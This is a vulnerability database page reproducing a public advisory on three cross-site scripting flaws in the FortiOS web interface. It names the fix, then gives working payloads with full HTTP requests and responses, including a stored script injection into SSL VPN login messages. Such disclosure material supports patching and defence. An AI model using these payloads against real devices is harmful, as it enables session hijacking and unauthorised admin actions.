Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPatryk BogdanPACKETSTORM:143543
HistoryJul 28, 2017 - 12:00 a.m.

FortiOS 5.6.0 Cross Site Scripting

2017-07-2800:00:00
Patryk Bogdan
packetstormsecurity.com
29

0.001 Low

EPSS

Percentile

48.8%

JSON
`# Title: FortiOS <= 5.6.0 Multiple XSS Vulnerabilities  
# Vendor: Fortinet (www.fortinet.com)  
# CVE: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133  
# Date: 28.07.2016  
# Author: Patryk Bogdan (@patryk_bogdan)  
  
Affected FortiNet products:  
* CVE-2017-3131 : FortiOS versions 5.4.0 to 5.6.0  
* CVE-2017-3132 : FortiOS versions upto 5.6.0  
* CVE-2017-3133 : FortiOS versions upto 5.6.0  
  
Fix:  
Upgrade to FortiOS version 5.6.1  
  
Video PoC (add admin):  
https://youtu.be/fcpLStCD61Q  
  
Vendor advisory:  
https://fortiguard.com/psirt/FG-IR-17-104  
  
  
Vulns:  
  
1. XSS in WEB UI - Applications:  
  
URL:  
https://192.168.1.99/ng/fortiview/app/15832" onmouseover=alert('XSS') x="y  
  
Http request:  
GET /ng/fortiview/app/15832%22%20onmouseover=alert('XSS')%20x=%22y HTTP/1.1  
Host: 192.168.1.99  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AZxzmYv40KrD1JvCdcctTzmuS+OEd08y+4Vh54tq%2Fap2ej%2F1gJfbaindJ5r4wDXZh%0A4q%2FfgVCdTfMFn+Mr6Xj5Og%3D%3D%0A%26AuthHash%3D9+TbiFXbk+Qkks0pPlkbNDx2L1EA%0A"; ccsrftoken_573485771="5424C6B3842788A23E3413307F1DFFC5"; ccsrftoken="5424C6B3842788A23E3413307F1DFFC5"; VDOM_573485771=root; csrftoken_573485771=da85e919f71a610c45aff174b23c7a10  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
Http response:  
HTTP/1.1 200 OK  
Date: Thu, 23 Mar 2017 12:07:47 GMT  
Server: xxxxxxxx-xxxxx  
Cache-Control: no-cache  
Pragma: no-cache  
Expires: -1  
Vary: Accept-Encoding  
Content-Length: 6150  
Connection: close  
Content-Type: text/html; charset=utf-8  
X-Frame-Options: SAMEORIGIN  
Content-Security-Policy: frame-ancestors 'self'  
X-UA-Compatible: IE=Edge  
(...)  
<span class="fgd-app tooltip id_15832" onmouseover="alert('XSS')" x="y " data-address="undefined" data-dport="443" data-protocol="6"><a href="https://www.fortiguard.com/fos/15832" onclick="return false;" data-hasqtip="2"><span class="app_icon app15832" onmouseover="alert('XSS')" x="y"></span><label class="app_label" title="">15832" onmouseover=alert('XSS') x="y</label></a></span>  
(...)  
  
  
2. XSS in WEB UI - Assign Token:  
  
URL:  
https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cscript%3E  
  
Http request:  
GET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3Cscript%3E HTTP/1.1  
Host: 192.168.1.99  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0ALuXSfDjrp0Gel8F8TeKlBgC3kk4P1mhdELHr2Cicb3Zb6hBUnT9ZZnjXC44Dc7bD%0Ae2ymJG%2FgbHFa+4N9AVDIrg%3D%3D%0A%26AuthHash%3DMyJMLA32ueruHIEKia2eb9BWi8oA%0A"; ccsrftoken_573485771="314A25687F6B2075F9413405575D477"; ccsrftoken="314A25687F6B2075F9413405575D477"; VDOM_573485771=root; csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
Http response:  
HTTP/1.1 200 OK  
Date: Thu, 23 Mar 2017 13:39:17 GMT  
Server: xxxxxxxx-xxxxx  
Content-Security-Policy: frame-ancestors 'self'  
Expires: Thu, 23 Mar 2017 13:39:17 GMT  
Vary: Cookie,Accept-Encoding  
Last-Modified: Thu, 23 Mar 2017 13:39:17 GMT  
X-UA-Compatible: IE=Edge  
Cache-Control: max-age=0  
X-FRAME-OPTIONS: SAMEORIGIN  
Set-Cookie: csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160; expires=Thu, 22-Mar-2018 13:39:17 GMT; Max-Age=31449600; Path=/  
Connection: close  
Content-Type: text/html; charset=utf-8  
Content-Length: 3485  
(...)  
<script type="text/javascript">  
var ftokens = [];  
var action = '</script><script>alert('XSS')</script><script>';  
</script>  
</head>  
(...)  
  
  
3. Stored XSS in WEB UI - Replacement Messages:  
  
#1 - Http request:  
POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1  
Host: 192.168.1.99  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: */*  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff  
X-Requested-With: XMLHttpRequest  
Content-Length: 125  
Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D  
DNT: 1  
Connection: close  
  
csrfmiddlewaretoken=d58f666c794024295cece8c5b8b6a3ff&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert('XSS')%3C%2Fscript%3E%0A  
  
#1 - Http response:  
HTTP/1.1 302 FOUND  
Date: Thu, 23 Mar 2017 15:36:33 GMT  
Server: xxxxxxxx-xxxxx  
Content-Security-Policy: frame-ancestors 'self'  
Expires: Thu, 23 Mar 2017 15:36:33 GMT  
Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT  
Cache-Control: max-age=0  
X-FRAME-OPTIONS: SAMEORIGIN  
X-UA-Compatible: IE=Edge  
Set-Cookie: EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D; Path=/  
Location: https://192.168.1.99/p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/  
Connection: close  
Content-Type: text/html; charset=utf-8  
Content-Length: 0  
  
#2 - Http request:  
GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1  
Host: 192.168.1.99  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: */*  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff  
X-Requested-With: XMLHttpRequest  
Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D  
DNT: 1  
Connection: close  
  
#2 - Http response:  
HTTP/1.1 200 OK  
Date: Thu, 23 Mar 2017 15:36:33 GMT  
Server: xxxxxxxx-xxxxx  
Content-Security-Policy: frame-ancestors 'self'  
Expires: Thu, 23 Mar 2017 15:36:33 GMT  
Vary: Cookie,Accept-Encoding  
Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT  
X-UA-Compatible: IE=Edge  
Cache-Control: max-age=0  
X-FRAME-OPTIONS: SAMEORIGIN  
Set-Cookie: csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; expires=Thu, 22-Mar-2018 15:36:33 GMT; Max-Age=31449600; Path=/  
Connection: close  
Content-Type: text/html; charset=utf-8  
Content-Length: 70940  
(...)  
<form id="replacemsg_form">  
<div style='display:none'><input type='hidden' name='csrfmiddlewaretoken' value='d58f666c794024295cece8c5b8b6a3ff' /></div> <textarea id="buffer" name="buffer">ABC</textarea>  
<script>alert('XSS')</script>  
</textarea>  
(...)  
`

Related

zdt 1
exploitpack 1
fortinet 1
nessus 2
exploitdb 1
cvelist 3
cve 3
prion 3
nvd 3
zdt
zdt
FortiOS < 5.6.0 - Cross-Site Scripting Vulnerability
2017-07-28 00:00:00
exploitpack
exploitpack
FortiOS 5.6.0 - Cross-Site Scripting
2017-07-28 00:00:00
fortinet
fortinet
FortiOS XSS vulnerabilities via FortiView Application filter, FortiToken activation & SSL VPN Replacement Messages
2017-07-28 00:00:00
nessus
nessus
Fortinet FortiOS 5.2.x < 5.2.12 / 5.4.x < 5.4.6 / 5.6.x < 5.6.1 Multiple Vulnerabilities (FG-IR-17-104)
2017-08-02 00:00:00
Fortinet FortiOS 5.4.x < 5.4.6 / 5.6.x < 5.6.1 XSS (CVE-2017-3131)
2018-12-18 00:00:00
exploitdb
exploitdb
Fortinet FortiOS &lt; 5.6.0 - Cross-Site Scripting
2017-07-28 00:00:00
cvelist
cvelist
CVE-2017-3132
2017-09-11 00:00:00
CVE-2017-3133
2017-09-11 00:00:00
CVE-2017-3131
2017-09-11 00:00:00
cve
cve
CVE-2017-3131
2017-09-12 02:29:00
CVE-2017-3132
2017-09-12 02:29:00
CVE-2017-3133
2017-09-12 02:29:00
prion
prion
Cross site scripting
2017-09-12 02:29:00
Cross site scripting
2017-09-12 02:29:00
Cross site scripting
2017-09-12 02:29:00
nvd
nvd
CVE-2017-3132
2017-09-12 02:29:00
CVE-2017-3131
2017-09-12 02:29:00
CVE-2017-3133
2017-09-12 02:29:00

0.001 Low

EPSS

Percentile

48.8%

JSON
Related for PACKETSTORM:143543
zdt1exploitpack1fortinet1nessus2exploitdb1cvelist3cve3prion3nvd3